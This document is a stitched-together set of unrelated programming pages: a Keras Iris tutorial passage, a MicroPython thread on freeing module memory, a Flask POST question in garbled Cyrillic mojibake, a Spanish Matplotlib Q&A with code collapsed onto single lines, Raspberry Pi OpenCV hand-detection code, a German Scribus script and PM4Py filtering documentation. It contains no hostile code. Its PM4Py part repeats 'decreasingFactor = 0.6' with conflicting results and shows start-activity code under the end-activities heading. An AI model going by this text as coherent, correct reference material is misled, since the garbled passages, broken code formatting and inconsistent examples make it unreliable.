# Splitting data into training and test set
X = iris_data.iloc[:,1:5].values
With the above code we have selected all the rows (indicated by the colon) andthe columns at index 1, 2, 3, and 4 (indicated by the 1:5). You may bewondering why the fifth column was not included, as we specified 1:5, that'sbecause in Python we're counting from one up to five, but not including it. Ifwe wanted the fifth column, we'd need to specify 1:6. It's important toremember that Python's indexing starts at 0, not 1. If we had specified 0:5,we would also be selecting the "Id" column.
To remind ourselves of what columns are at index 1, 2, 3, and 4, let's use the pandas.DataFrame.head() method from the first part.
Samples from the Iris Flower dataset with the column indices labelled in red.
We can also print out the contents of our new variable, X, which is storing all the Sepal Length/Width and Petal Length/Width data for our 150 samples. This is all of our input data.
The input data selected from the Iris Flower dataset.
For now, that is all the processing needed for the input parameters.
Classification labels
We know from our dataset analysis in part 1 that our samples are classifiedinto three categories, " Iris-setosa ", " Iris-virginica ", and " Iris-versicolor ". However, this alphanumeric representation of the labels is notcompatible with our machine learning functions, so we need to convert theminto something numeric.
Again, there are many ways to achieve a similar result, but let's use pandasfeatures for categorical data. By explicitly selecting the Species columnfrom our dataset as being of the category datatype, we can usepandas.Series.cat.codes to get numeric values forour class labels.
We have one extra step, because we plan on using the categorical_crossentropyobjective function to train our model. The Keras documentation gives thefollowing instructions:
When using the
categorical_crossentropyloss, your targets should be in categorical format (e.g. if you have 10 classes, the target for each sample should be a 10-dimensional vector that is all-zeros except for a 1 at the index corresponding to the class of the sample).
Keras Documentation (https://keras.io/losses)
What this means is we will need to use One-hot encoding. This is quite typical for categorical data which is to be used with machine learning algorithms. Here is an example of One-hot encoding using the Iris Flower dataset:
One-hot encoding of the Iris Flower dataset class labels.
You can see that each classification label has its own column, so Setosa is \(1,0,0\), Virginica is \(0,1,0\), and Versicolor is \(0,0,1\).
Luckily encoding our labels using Python and Keras is easy, and we've alreadycompleted the first step which is converting our alphanumeric classes tonumeric ones. To convert to One-hot encoding we can use keras.utils.to_categorical():
# Use One-hot encoding for class labels
Y = keras.utils.to_categorical(y,num_classes=None)
Training and testing split
In the previous part of this series we decided on the following:
The Iris Flower dataset is relatively small at exactly 150 samples. Because of this, we will use 70% of the dataset for training, and the remaining 30% for testing, otherwise our test set will be a little on the small side.
Machine Learning with Kaggle Notebooks - Part 2
This is where sklearn.model_selection.train_test_split()comes in. This function will split our dataset into a randomised training andtesting subset:
# split into randomised training and testing subset
X_train, X_test, y_train, y_test = train_test_split(X,Y,test_size=0.3,random_state=0)
This code splits the data, giving 30% (45 samples) to the testing set and theremaining 70% (105 samples) for the training set. The 30/70 split is definedusing test_size=0.3 and random_state=0 defines the seed for therandomisation of the subsets.
These have been spread across four new arrays storing the following data:
X_train: the input parameters, to be used for training.
y_train: the classification labels corresponding to the X_train above, to be used for training.
X_test: the input parameters, to be used for testing.
y_test: the classification labels corresponding to the X_test above, to be used for testing.
Before moving on, I recommend you have a closer look at the above four variables, so that you understand the division of the dataset.
Neural networks with Keras
Keras is the software library we will be using through Python, to code up and conduct our experiments. It's a user friendly high-level neural networks library which in our case will be running on top of TensorFlow. What is most attractive about Keras is how quickly you can go from your design to the result.
Configuring the model
The keras.Sequential() model allowsyou to build a neural network by stacking layers. You can add layers using theadd() method, which in our case will be Dense() layers. A dense layer is alayer in which every neuron is connected to every neuron in the next layer.Dense() expects a number of parameters, e.g. the number of neurons to be onthe layer, the activation function, the input_shape (if it is the first layerin the model), etc.
model = keras.Sequential()
model.add(keras.layers.Dense(4, input_shape=(4,), activation='tanh'))
model.add(keras.layers.Dense(3, activation='softmax'))
In the above code we have created our empty model and then added two layers, the first is a hidden layer consisting of four neurons which are expecting four inputs. The second layer is the output layer consisting of our three output neurons.
We then need to configure our model for training, which is achieved using thecompile() method. Here we will specify our optimiser to be Adam(), configure for categoricalclassification, and specify our use of accuracy for the metric.
model.compile(keras.optimizers.Adam(), 'categorical_crossentropy', metrics=['accuracy'])
At this point, you may wish to use the summary() method to confirm you'vebuilt the model as intended:
Training the model
Now comes the actual training of the model! We're going to use the fit()method of the model and specify the training input data and desired labels,the number of epochs (the number of times the training algorithm sees theentire dataset), a flag to set the verbosity of the process to silent.Setting the verbosity to silent is entirely optional, but it helps us managethe notebook output.
model.fit(X_train, y_train, epochs=300, verbose=0)
If you're interested in receiving more feedback during the training (oroptimisation) process, you can remove the assignment of the verbose flagwhen invoking the fit() method to use the default value. Now when thetraining algorithm is being executed, you will see output at every epoch:
Testing the model
After the neural network has been trained, we want to evaluate it against ourtest set and output its accuracy. The evaluate() method returns a listcontaining the loss value at index 0 and in this case, the accuracy metric atindex 1.
accuracy = model.evaluate(X_test, y_test)[1]
If we run all the code up until this point, and we output the contents of ouraccuracy variable, we should see something similar to the following:
Generating all our results
Up until this point, we have successfully prepared the Iris Flower dataset, configured our model, trained our model, evaluated it using the test set, and reported its accuracy. However, this reported accuracy is only one sample of our desired thirty.
We can do this with a simple loop to repeat the process thirty times, and a list to store all the results. This only requires some minor modifications to our existing code:
results_control_accuracy = []
for i in range(0,30):
model = keras.Sequential()
model.add(keras.layers.Dense(4, input_shape=(4,), activation='tanh'))
model.add(keras.layers.Dense(3, activation='softmax'))
model.compile(keras.optimizers.Adam(lr=0.04),'categorical_crossentropy',metrics=['accuracy'])
model.fit(X_train,y_train,epochs=100, verbose=0)
accuracy = model.evaluate(X_test, y_test)[1]
results_control_accuracy.append(accuracy)
print(results_control_accuracy)
This will take a few minutes to execute depending on whether you're using a Kaggle Kernel notebook or your own development environment, but once it has you should see a list containing the accuracy results for all thirty of the executions (but your results will vary):
[0.9333333359824286, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.6000000052981906, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9111111124356588, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9111111124356588]
These are the results for our control arm, let's now do the same for our experimental arm. The experimental arm only has one difference: the number of neurons on the hidden layer. We can re-use our code for the control arm and just make a single modification where:
model.add(keras.layers.Dense(4, input_shape=(4,), activation='tanh'))
is changed to:
model.add(keras.layers.Dense(5, input_shape=(4,), activation='tanh'))
Of course, we'll also need to change the name of the list variable so that we don't overwrite the results for our control arm. The code will end up looking like this:
results_experimental_accuracy = []
for i in range(0,30):
model = keras.Sequential()
model.add(keras.layers.Dense(5, input_shape=(4,), activation='tanh'))
model.add(keras.layers.Dense(3, activation='softmax'))
model.compile(keras.optimizers.Adam(lr=0.04),'categorical_crossentropy',metrics=['accuracy'])
model.fit(X_train,y_train,epochs=100, verbose=0)
accuracy = model.evaluate(X_test, y_test)[1]
results_experimental_accuracy.append(accuracy)
print(results_experimental_accuracy)
After executing the above and waiting a few minutes, we will have our second set of results:
[0.9111111124356588, 0.9555555568801032, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.933333334657881, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.933333334657881, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9333333359824286, 0.9777777791023254, 0.9777777791023254, 0.9333333359824286, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254]
Saving the results
The results for our experiment have been generated, and it's important that wesave them somewhere, so we that can use them later. There are multipleapproaches to saving or persisting your data, but we are going to make use ofpandas.DataFrame.to_csv():
pd.DataFrame(results_control_accuracy).to_csv('results_control_accuracy.csv', index=False)
pd.DataFrame(results_experimental_accuracy).to_csv('results_experimental_accuracy.csv', index=False)
The above code will save your results to individual files corresponding to the arm of the experiment. Where the files go depend entirely on your development environment. If you're developing in your own local environment, then you will likely find the files in the same folder as your notebook or script. If you're using a Kaggle Notebook, it is important that you click the blue commit button in the top right of the page.
It will take a few minutes to commit your notebook but once it's done, you know your file is safe. It's not immediately obvious where the files have been stored, but you can double check their existence by repeating the following steps:
Conclusion
In this article we prepared our dataset such that it was ready to be fed into our neural network training and testing process. We then built and trained our neural network models using Python and Keras, followed by some simple automation to generate thirty samples per arm of our experiment.
In the next part of this four-part series, we will have a look at how our solutions performed and discuss anything interesting about the results. This will include some visualisation, and we may even return to our experiment code to produce some new results.
|
Is there any way how to remove imported module from RAM?
E.g. - it would make sense for untplib/NTPClient which is usually required to be used only once during boot process.
Class instantiated as an object can be deleted from RAM by "del" method?
E.g. - it would make sense for untplib/NTPClient which is usually required to be used only once during boot process.
Class instantiated as an object can be deleted from RAM by "del" method?
As far as I've been able to tell, the memory is released if you delete it from sys.modules and also remove any other references to it (then call gc() if you want)
I didn't know about those "interned strings" though.
If we delete a module, then import it again later, does it leak? (I don't know the answer to this).
It seems reasonable to import a module, do some setup work (e.g. at reset), then when finished, delete the module to allow more ram for later usage.
I didn't know about those "interned strings" though.
If we delete a module, then import it again later, does it leak? (I don't know the answer to this).
It seems reasonable to import a module, do some setup work (e.g. at reset), then when finished, delete the module to allow more ram for later usage.
It should not leak, but it can worsen the memory fragmentation.markxr wrote: If we delete a module, then import it again later, does it leak? (I don't know the answer to this).
It seems reasonable to import a module, do some setup work (e.g. at reset), then when finished, delete the module to allow more ram for later usage.
Instead of deleting a module after your work with it is done, it seems to be much better to simply avoid public globals in your modules all together, and they only take up a little bit of space -- the rest is allocated dynamically as you use it.
I'm having problems with unloading modules, the RAM does not get freed.
I'm using this function to delete a module:I am importing a module and call one function. Then I delete it like that:But the RAM is only a small amount higher than with the module imported, far away from the free RAM before I imported the module.
I'm using this function to delete a module:
Code: Select all
def unloadModule(mod):
# removes module from the system
mod_name = mod.__name__
if mod_name in sys.modules:
del sys.modules[mod_name]
Code: Select all
from pysmartnode.helpers import helper
helper.help()
unloadModule(helper)
del helper
Kevin Köck
Micropython Smarthome Firmware (with Home-Assistant integration): https://github.com/kevinkk525/pysmartnode
Micropython Smarthome Firmware (with Home-Assistant integration): https://github.com/kevinkk525/pysmartnode
it was not in sys.modules anymore and I don't have a reference to the module itself as I just call a function and delete the module.
pysmartnode and pysmartnode.helpers have been loaded before already and other modules in these packages are being used.
My goal is to outsource certain functions that are only needed once to different modules. Then I can just import these if they are necessary and unload them afterwards, freeing up some RAM that would otherwise be used by all the functions being in one module although only 20% might be used (it depends on user configuration, etc).
pysmartnode and pysmartnode.helpers have been loaded before already and other modules in these packages are being used.
My goal is to outsource certain functions that are only needed once to different modules. Then I can just import these if they are necessary and unload them afterwards, freeing up some RAM that would otherwise be used by all the functions being in one module although only 20% might be used (it depends on user configuration, etc).
Kevin Köck
Micropython Smarthome Firmware (with Home-Assistant integration): https://github.com/kevinkk525/pysmartnode
Micropython Smarthome Firmware (with Home-Assistant integration): https://github.com/kevinkk525/pysmartnode
Yea , I dont think it is that simple guys .
Interned string of that module will still exist in RAM
import micropython
micropython.qstr_info(1)
There exist every string , the memory that didnt get freed is here.
How to delete interned string may you ask , working on it )
Interned string of that module will still exist in RAM
import micropython
micropython.qstr_info(1)
There exist every string , the memory that didnt get freed is here.
How to delete interned string may you ask , working on it )
|
добÑого вÑемени.
ÐÐµÐ»Ð°Ñ Ð°Ð¿Ð¸ запÑÐ¾Ñ POST. СобÑÑвенно код.
from flask import Flask
from flask import jsonify, request
app = Flask(__name__)
@app.route('/api/func/<int:id>/', methods=['POST'])
def func(id):
data = request.json
return jsonify(data)
app.run(...)
Ðеб ÑеÑÐ²ÐµÑ Flask ÑабоÑÐ°ÐµÑ Ð¸ÑпÑавно. Get запÑоÑÑ Ð¿ÑÐ¸Ð½Ð¸Ð¼Ð°ÐµÑ Ð½Ð¾Ñм.
ÐÑи оÑпÑавке POST запÑоÑа Ñ data = {'data': 'some_data'}
вÑÐ´Ð°ÐµÑ data = None
ÐÐµÐ»Ð°Ñ Ð·Ð°Ð¿ÑÐ¾Ñ CURL
curl -i -X POST -d "{'data': 'some_data'}" http://IP:PORT/api/func/<id>/
вÑÐ´Ð°ÐµÑ Ñакой оÑвеÑ
где
null
ÑÑо как Ñаз возвÑаÑÐµÐ½Ð½Ð°Ñ data.
Ðн же должен веÑнÑÑÑ {'data': 'some_data'}
ЧÑо Ñ Ð´ÐµÐ»Ð°Ñ Ð½Ðµ Ñак?
UPD. Ñ PUT запÑоÑом Ñа же иÑÑоÑиÑ, request.json пÑÑÑой.
|
Estoy intentando usar Python y Matplotlib para renderizar una superficie 3D de un poliedro, dada por
Sin embargo, mi código (que se muestra a continuación) no parece dibujarlo correctamente. ¿Cómo debería hacerse esto en su lugar?
Intento fallido:
%matplotlib inline import numpy as np import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D from matplotlib import cm from matplotlib.ticker import LinearLocator, FormatStrFormatter delta = 0.1 def x_func(x): return abs(x) def y_func(y): return abs(y) def z_func(z): return abs(z) x = np.arange(-1, 1, delta) x1 = x_func(x) y = np.arange(-1, 1, delta) y1 = y_func(y) X, Y = meshgrid(x1, y1) z = np.arange(-1, 1, delta) Z = z_func(z) fig = plt.figure() ax = fig.gca(projection='3d') ax.set_xlim([-1,1]) ax.set_ylim([-1,1]) ax.set_zlim([-1,1]) surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.RdBu, linewidth=0.1)
Aquí hay una solución:
import mpl_toolkits.mplot3d as a3 import numpy as np import matplotlib.pyplot as plt import matplotlib.colors as colors import scipy as sp # Vertex data verts= [ (-1, -1, -1), (-1, -1, 1), (-1, 1, 1), (-1, 1, -1), (1, -1, -1), (1, -1, 1), (1, 1, 1), (1, 1, -1) ] # Face data faces = np.array([ [0, 1, 2, 3], [4, 5, 6, 7], [0, 3, 7, 4], [1, 2, 6, 5], [0, 1, 5, 4], [2, 3, 7, 6] ]) ax = a3.Axes3D(plt.figure()) ax.dist=30 ax.azim=-140 ax.elev=20[enter image description here][1] ax.set_xlim([-1,1]) ax.set_ylim([-1,1]) ax.set_zlim([-1,1]) for i in np.arange(len(faces)): square=[ verts[faces[i,0]], verts[faces[i,1]], verts[faces[i, 2]], verts[faces[i, 3]]] face = a3.art3d.Poly3DCollection([square]) face.set_color(colors.rgb2hex(sp.rand(3))) face.set_edgecolor('k') face.set_alpha(0.5) ax.add_collection3d(face) plt.show()
La salida de la figura es la siguiente: la superficie de un cubo.
|
Code: Select all
from .cv2 import * ImportError: libQtTest.so.4: cannot open shared object file: No such file or directory
Code: Select all
libQtTest
Code: Select all
libatlas
Code: Select all
libjasper
For now Im trying to remove this error on following code, but it does shows the same error in other codes too, Ive thrice updated my pi.
Code: Select all
import cv2
import numpy as np
import time
#Open Camera object
cap = cv2.VideoCapture(0)
#Decrease frame size
cap.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, 1000)
cap.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, 600)
def nothing(x):
pass
# Function to find angle between two vectors
def Angle(v1,v2):
dot = np.dot(v1,v2)
x_modulus = np.sqrt((v1*v1).sum())
y_modulus = np.sqrt((v2*v2).sum())
cos_angle = dot / x_modulus / y_modulus
angle = np.degrees(np.arccos(cos_angle))
return angle
# Function to find distance between two points in a list of lists
def FindDistance(A,B):
return np.sqrt(np.power((A[0][0]-B[0][0]),2) + np.power((A[0][1]-B[0][1]),2))
# Creating a window for HSV track bars
cv2.namedWindow('HSV_TrackBar')
# Starting with 100's to prevent error while masking
h,s,v = 100,100,100
# Creating track bar
cv2.createTrackbar('h', 'HSV_TrackBar',0,179,nothing)
cv2.createTrackbar('s', 'HSV_TrackBar',0,255,nothing)
cv2.createTrackbar('v', 'HSV_TrackBar',0,255,nothing)
while(1):
#Measure execution time
start_time = time.time()
#Capture frames from the camera
ret, frame = cap.read()
#Blur the image
blur = cv2.blur(frame,(3,3))
#Convert to HSV color space
hsv = cv2.cvtColor(blur,cv2.COLOR_BGR2HSV)
#Create a binary image with where white will be skin colors and rest is black
mask2 = cv2.inRange(hsv,np.array([2,50,50]),np.array([15,255,255]))
#Kernel matrices for morphological transformation
kernel_square = np.ones((11,11),np.uint8)
kernel_ellipse= cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
#Perform morphological transformations to filter out the background noise
#Dilation increase skin color area
#Erosion increase skin color area
dilation = cv2.dilate(mask2,kernel_ellipse,iterations = 1)
erosion = cv2.erode(dilation,kernel_square,iterations = 1)
dilation2 = cv2.dilate(erosion,kernel_ellipse,iterations = 1)
filtered = cv2.medianBlur(dilation2,5)
kernel_ellipse= cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(8,8))
dilation2 = cv2.dilate(filtered,kernel_ellipse,iterations = 1)
kernel_ellipse= cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
dilation3 = cv2.dilate(filtered,kernel_ellipse,iterations = 1)
median = cv2.medianBlur(dilation2,5)
ret,thresh = cv2.threshold(median,127,255,0)
#Find contours of the filtered frame
contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
#Draw Contours
#cv2.drawContours(frame, cnt, -1, (122,122,0), 3)
#cv2.imshow('Dilation',median)
#Find Max contour area (Assume that hand is in the frame)
max_area=100
ci=0
for i in range(len(contours)):
cnt=contours[i]
area = cv2.contourArea(cnt)
if(area>max_area):
max_area=area
ci=i
#Largest area contour
cnts = contours[ci]
#Find convex hull
hull = cv2.convexHull(cnts)
#Find convex defects
hull2 = cv2.convexHull(cnts,returnPoints = False)
defects = cv2.convexityDefects(cnts,hull2)
#Get defect points and draw them in the original image
FarDefect = []
for i in range(defects.shape[0]):
s,e,f,d = defects[i,0]
start = tuple(cnts[s][0])
end = tuple(cnts[e][0])
far = tuple(cnts[f][0])
FarDefect.append(far)
cv2.line(frame,start,end,[0,255,0],1)
cv2.circle(frame,far,10,[100,255,255],3)
#Find moments of the largest contour
moments = cv2.moments(cnts)
#Central mass of first order moments
if moments['m00']!=0:
cx = int(moments['m10']/moments['m00']) # cx = M10/M00
cy = int(moments['m01']/moments['m00']) # cy = M01/M00
centerMass=(cx,cy)
#Draw center mass
cv2.circle(frame,centerMass,7,[100,0,255],2)
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(frame,'Center',tuple(centerMass),font,2,(255,255,255),2)
#Distance from each finger defect(finger webbing) to the center mass
distanceBetweenDefectsToCenter = []
for i in range(0,len(FarDefect)):
x = np.array(FarDefect[i])
centerMass = np.array(centerMass)
distance = np.sqrt(np.power(x[0]-centerMass[0],2)+np.power(x[1]-centerMass[1],2))
distanceBetweenDefectsToCenter.append(distance)
#Get an average of three shortest distances from finger webbing to center mass
sortedDefectsDistances = sorted(distanceBetweenDefectsToCenter)
AverageDefectDistance = np.mean(sortedDefectsDistances[0:2])
#Get fingertip points from contour hull
#If points are in proximity of 80 pixels, consider as a single point in the group
finger = []
for i in range(0,len(hull)-1):
if (np.absolute(hull[i][0][0] - hull[i+1][0][0]) > 80) or ( np.absolute(hull[i][0][1] - hull[i+1][0][1]) > 80):
if hull[i][0][1] <500 :
finger.append(hull[i][0])
#The fingertip points are 5 hull points with largest y coordinates
finger = sorted(finger,key=lambda x: x[1])
fingers = finger[0:5]
#Calculate distance of each finger tip to the center mass
fingerDistance = []
for i in range(0,len(fingers)):
distance = np.sqrt(np.power(fingers[i][0]-centerMass[0],2)+np.power(fingers[i][1]-centerMass[0],2))
fingerDistance.append(distance)
#Finger is pointed/raised if the distance of between fingertip to the center mass is larger
#than the distance of average finger webbing to center mass by 130 pixels
result = 0
for i in range(0,len(fingers)):
if fingerDistance[i] > AverageDefectDistance+130:
result = result +1
#Print number of pointed fingers
cv2.putText(frame,str(result),(100,100),font,2,(255,255,255),2)
#show height raised fingers
#cv2.putText(frame,'finger1',tuple(finger[0]),font,2,(255,255,255),2)
#cv2.putText(frame,'finger2',tuple(finger[1]),font,2,(255,255,255),2)
#cv2.putText(frame,'finger3',tuple(finger[2]),font,2,(255,255,255),2)
#cv2.putText(frame,'finger4',tuple(finger[3]),font,2,(255,255,255),2)
#cv2.putText(frame,'finger5',tuple(finger[4]),font,2,(255,255,255),2)
#cv2.putText(frame,'finger6',tuple(finger[5]),font,2,(255,255,255),2)
#cv2.putText(frame,'finger7',tuple(finger[6]),font,2,(255,255,255),2)
#cv2.putText(frame,'finger8',tuple(finger[7]),font,2,(255,255,255),2)
#Print bounding rectangle
x,y,w,h = cv2.boundingRect(cnts)
img = cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)
cv2.drawContours(frame,[hull],-1,(255,255,255),2)
##### Show final image ########
cv2.imshow('Dilation',frame)
###############################
#Print execution time
#print time.time()-start_time
#close the output video by pressing 'ESC'
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
|
Dieses Skript erzeugt nummerierte Karten, z.B. Eintrittskarten. Der Code (befindet sich neben Beispieldaten auch im Anhang):
Code: Alles auswählen
#!/usr/bin/env Python
# -*- coding: utf-8 -*-
import scribus
#################################
# Einstellungen:
# Anzahl an Karten:
anzahl = 48
# Anzahl der Karten pro Seite:
anzahl_pro_seite = 16
# Anzahl der Spalten:
spalten = 2
# Versatz der rechten Karte von der linken, bzw. von der unteren zur Oberen
abstand_x = 90.89
abstand_y = 33.5975
# Absatzstile für die Textbox mit der Nummer:
stil = "Nummer"
# Musterseite mit dem Layout der Karte:
musterseite = "Karten"
##################################
# Beginn Skript:
# Informationen über das Textfeld beschaffen:
x,y = scribus.getPosition()
breite, hoehe = scribus.getSize()
zaehler = int(scribus.getText())
anzahl_stellen = len(scribus.getText())
# Verschiedene Variablen festlegen...
anzahl_pro_spalte = anzahl_pro_seite / spalten
x_neu = x
y_neu = y + abstand_y
zaehler_seite = 0
zaehler_spalte = 1
while zaehler != anzahl:
while zaehler_seite < anzahl_pro_seite:
while zaehler_spalte < anzahl_pro_spalte:
zaehler = zaehler + 1
zaehler_spalte = zaehler_spalte + 1
rahmen = scribus.createText(x_neu, y_neu, breite, hoehe)
scribus.setText(str(zaehler).zfill(anzahl_stellen), rahmen)
scribus.setStyle(stil, rahmen)
y_neu = y_neu + abstand_y
if zaehler == anzahl:
break
if zaehler == anzahl:
break
x_neu = x_neu + abstand_x
y_neu = y
zaehler_seite = zaehler_seite + zaehler_spalte
zaehler_spalte = 0
if zaehler < anzahl:
zaehler_seite = 0
zaehler_spalte = 0
scribus.newPage(-1, musterseite)
scribus.gotoPage(scribus.pageCount())
y_neu = y
x_neu = x
Dokument anlegen: Stil für die Nummer namens „Nummer“ und eine Musterseite mit dem Namen „Karten“ (Namen können im Skript geändert werden)
Skript anpassen: Im ersten Abschnitt die Variablen auf die gewünschten Werte setzen
Skript ausführen: Den ersten Textrahmen mit der gewünschten Anfangsnummer und der gewünschten Anzahl an Stellen auffüllen, z.B.00023und diesen markieren (wichtig!), dann erst das Skript ausführen.
Das Dokument speichern, exportieren, drucken und (am besten mit einer Schneidevorrichtung) zuschneiden ;-)
Fenster) auf gleichen vertikalen / horizontalen Abstand bringen (In der angezeigten Warnung gesperrte Objekte ignorieren auswählen)
Lizenz:
Gruß
Julius
|
Filtering is one of the most important techniques in Process Mining as it permits to retrieve a smaller part of the log that contains the information we need to use/exploit.
In this page, a collection of techniques to filter a log object is reported. A log representation has the events already grouped in traces, and some techniques exist to filter the log:
Keeping/Removing the traces (so, all the events belonging to the traces) by a criteria
Trimming traces, keeping/removing events according to a specified criteria
To import a log object in PM4Py, the following code could be used:
import os from pm4py.objects.log.importer.xes import factory as xes_importer log_path = os.path.join("tests","input_data","receipt.xes") log = xes_importer.import_log(log_path)
The sort instruction is actually much important to being sure that traces are ordered
from pm4py.objects.log.util import sorting log = sorting.sort_timestamp(log)
Filtering on timeframe
A timeframe specifies a time interval that should be respected by traces or events. PM4Py provides the following filters on the timeframe.
Filtering traces contained in the timeframe
The following code could be used on the receipt.xes log, that filters traces contained in the interval between 09 March 2011 and 18 January 2012:
from pm4py.algo.filtering.log.timestamp import timestamp_filter filtered_log = timestamp_filter.filter_traces_contained(log, "2011-03-09 00:00:00", "2012-01-18 23:59:59")
If we print the size of the log against the one of the filtered log:
print(len(log)) print(len(filtered_log))
We get that while the original log contained 1434 traces, the filtered log contains only 959 traces.
Filtering traces intersecting the timeframe
The following code could be used on the receipt.xes log, that filters traces intersecting the interval between 09 March 2011 and 18 January 2012
from pm4py.algo.filtering.log.timestamp import timestamp_filter filtered_log = timestamp_filter.filter_traces_intersecting(log, "2011-03-09 00:00:00", "2012-01-18 23:59:59")
If we print the size of the log against the one of the filtered log, we get that while the original log contained 1434 traces, the filtered log contains only 975 traces.
Filtering events contained in the timeframe
In this case, we want to keep all the events contained in the timeframe, without preserving trace integrity. If we use the following code:
from pm4py.algo.filtering.log.timestamp import timestamp_filter filtered_log_events = timestamp_filter.apply_events(log, "2011-03-09 00:00:00", "2012-01-18 23:59:59")
We get a log that contains 975 traces (as the filtered log in the previous subsection), but in this case the number of events is smaller. Executing the following code we get the number of events of the previous filtered log and the number of events of the current filtered log:
print(sum([len(trace) for trace in filtered_log])) print(sum([len(trace) for trace in filtered_log_events]))
The number of events is 5756 for the first (so all the events of the trace are kept) and 5688 for the second (so traces have been trimmed).
Filtering on case performance
This filter permits to keep only traces in the log with duration that is inside a specified interval.
The following code applies a filter on case performance keeping only cases with duration between 1 day and 10 days:
from pm4py.algo.filtering.log.cases import case_filter filtered_log = case_filter.filter_on_case_performance(log, 86400, 864000)
On the receipt.xes log, the number of traces satisfying this criteria is 296.
Filtering on start activities
This filter permits to keep only traces in the log with a start activity among a set of specified activities.
To retrieve the list of start activities in the log, the following code could be used:
from pm4py.algo.filtering.log.start_activities import start_activities_filter log_start = start_activities_filter.get_start_activities(log)
In this case, we get the following dictionary reporting the start activities and the number of occurrences:
{'Confirmation of receipt': 1434}
To apply a filter (even if useless in this case) the following code could be used:
filtered_log = start_activities_filter.apply(log, ["Confirmation of receipt"])
It is possible to keep automatically the most frequent start activities, using the apply_auto_filter function. The function accept as parameter a decreasingFactor (by default equal to 0.6), and the working could be explained by an example. Suppose to have a log with the following start activities, ordered by number of occurrences:
Awith number of occurrences1000
Bwith number of occurrences700
Cwith number of occurrences300
Dwith number of occurrences50
The most frequent start activity (A with 1000 occurrences) is kept surely by the method. Then, the number of occurrences of B is compared with the number of occurrences of A: occ(B)/occ(A) = 0.7. If decreasingFactor=0.6, then B is also kept as admissible start activity (because occ(B)/occ(A) > 0.6); if decreasingFactor=0.8 then B is not kept as admissible end activity and the method stops here. Then, if B is accepted, also C is looked. We have occ(C)/occ(B) = 0.43. If decreasingFactor=0.6, then C is not accepted as admissible start activity and the method stops here.
Depending on the value of the decreasing factor, we have the following set of admitted start activities:
decreasingFactor = 0.8 => {A}
decreasingFactor = 0.6 => {A,B}
decreasingFactor = 0.6 => {A,B,C}
To apply a filter (and print the admitted start activities) the following code could be used:
from pm4py.algo.filtering.log.start_activities import start_activities_filter log_af_sa = start_activities_filter.apply_auto_filter(log, parameters={"decreasingFactor": 0.6}) print(start_activities_filter.get_start_activities(log_af_sa))
We get the following admitted start activities:
{'Confirmation of receipt': 1434}
Filtering on end activities
This filter permits to keep only traces in the log with a end activity among a set of specified activities.
To retrieve the list of end activities in the log, the following code could be used:
from pm4py.algo.filtering.log.end_activities import end_activities_filter log_end = end_activities_filter.get_end_activities(log)
In this case, we get the following dictionary reporting the end activities and the number of occurrences:
{'T02 Check confirmation of receipt': 8, 'T03 Adjust confirmation of receipt': 2, 'T10 Determine necessity to stop indication': 828, 'T20 Print report Y to stop indication': 15, 'T05 Print and send confirmation of receipt': 400, 'Confirmation of receipt': 116, 'T15 Print document X request unlicensed': 39, 'T11 Create document X request unlicensed': 4, 'T06 Determine necessity of stop advice': 16, 'T04 Determine confirmation of receipt': 2, 'T07-1 Draft intern advice aspect 1': 1, 'T13 Adjust document X request unlicensed': 1, 'T07-5 Draft intern advice aspect 5': 1, 'T07-2 Draft intern advice aspect 2': 1}
To apply a filter the following code could be used:
filtered_log = end_activities_filter.apply(log, ["T05 Print and send confirmation of receipt", "T10 Determine necessity to stop indication"])
In this case, if we print the length of the filtered log, it results that 1228 traces of the original 1434 are kept.
It is possible to automatically filter the log to keep the most frequent end activities in the log through the apply_auto_filter function that accepts as parameter a decreasingFactor (default 0.6; see the start activities filter for an explanation).
The following code filters the log keeping only the most frequent end activities:
from pm4py.algo.filtering.log.start_activities import start_activities_filter log_af_sa = start_activities_filter.apply_auto_filter(log, parameters={"decreasingFactor": 0.6}) print(start_activities_filter.get_start_activities(log_af_sa))
We get the following admitted end activities:
from pm4py.algo.filtering.log.end_activities import end_activities_filter log_af_ea = end_activities_filter.apply_auto_filter(log, parameters={"decreasingFactor": 0.6}) print(end_activities_filter.get_end_activities(log_af_ea))
Filtering on variants
A variant is a set of cases that share the same control-flow perspective, so a set of cases that share the same classified events (activities) in the same order.
To get the list of variants contained in a given log, the following code could be used:
from pm4py.algo.filtering.log.variants import variants_filter variants = variants_filter.get_variants(log)
This expressed as a dictionary having as key the variant and as value the list of cases that share the variant. If the number of occurrences of the variants is of interest, the following code retrieves a list of variants along with their count:
from pm4py.statistics.traces.log import case_statistics variants_count = case_statistics.get_variant_statistics(log) variants_count = sorted(variants_count, key=lambda x: x['count'], reverse=True) print(variants_count)
Obtaining the following output:
